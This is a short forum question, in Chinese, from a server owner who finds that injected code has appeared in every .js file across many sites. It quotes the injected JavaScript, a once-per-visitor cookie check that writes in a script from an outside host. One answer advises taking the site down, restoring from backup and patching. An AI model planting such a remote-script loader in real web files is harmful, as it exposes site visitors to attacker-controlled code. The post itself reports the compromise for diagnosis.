可能重复:
我的服务器被黑了 紧急求助
似乎有人通过在所有 .js 文件中插入代码入侵了我拥有的大量网站。
function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://mainscript.org/mainscript.js"></script>');}
我很好奇他是怎么做到的,因为我拥有该服务器,并且我激活了 mod_sec,禁用了许多功能,而我认为这样的安全性相当不错。
有什么建议吗?有什么想法吗?我只是想在这里集思广益。
答案1
最好的办法是关闭该网站。从备份中恢复,然后修补服务器/网站/软件等。